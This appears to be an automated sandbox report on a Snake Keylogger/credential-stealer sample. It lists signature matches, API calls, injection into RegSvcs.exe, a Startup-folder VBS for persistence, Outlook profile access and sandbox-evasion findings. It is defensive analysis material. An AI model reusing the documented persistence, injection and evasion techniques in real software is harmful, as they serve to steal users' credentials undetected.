Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005837B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005710BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A910BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0059A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0058648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | File created: C:\Users\user\AppData\Local\translucently
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | File created: C:\Users\user\AppData\Local\Temp\aut79C7.tmp
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs"
Source: ty1nyFUMlo.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003526000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.000000000351A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003555000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003594000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003588000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003563000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ty1nyFUMlo.exe | Virustotal: Detection: 61%
Source: ty1nyFUMlo.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | File read: C:\Users\user\Desktop\ty1nyFUMlo.exe
Source: unknown | Process created: C:\Users\user\Desktop\ty1nyFUMlo.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Process created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe"
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe"
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: ty1nyFUMlo.exe | Static file information: File size 1096704 > 1048576
Source: ty1nyFUMlo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ty1nyFUMlo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ty1nyFUMlo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ty1nyFUMlo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ty1nyFUMlo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ty1nyFUMlo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ty1nyFUMlo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
Source: ty1nyFUMlo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ty1nyFUMlo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ty1nyFUMlo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ty1nyFUMlo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ty1nyFUMlo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_00530A76 push ecx; ret 0_2_00530A89
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A50A76 push ecx; ret 2_2_00A50A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01929A20 push esp; retf 0572h 7_2_01929D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C786FD push ecx; retf 7_2_06C786FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_06C79241 push es; ret 7_2_06C79244
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | File created: C:\Users\user\AppData\Local\translucently\enterogenous.exe

                  Boot Survival

Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_0052F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Code function: 0_2_005A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00A4F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Code function: 2_2_00AC1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe API/Special instruction interceptor: Address: 162FCFC
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe API/Special instruction interceptor: Address: 174CCE4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598904
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597811
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597663
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597047
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596937
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595135
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594936
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594151
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599568
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599434
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599315
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599079
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598954
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598829
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598719
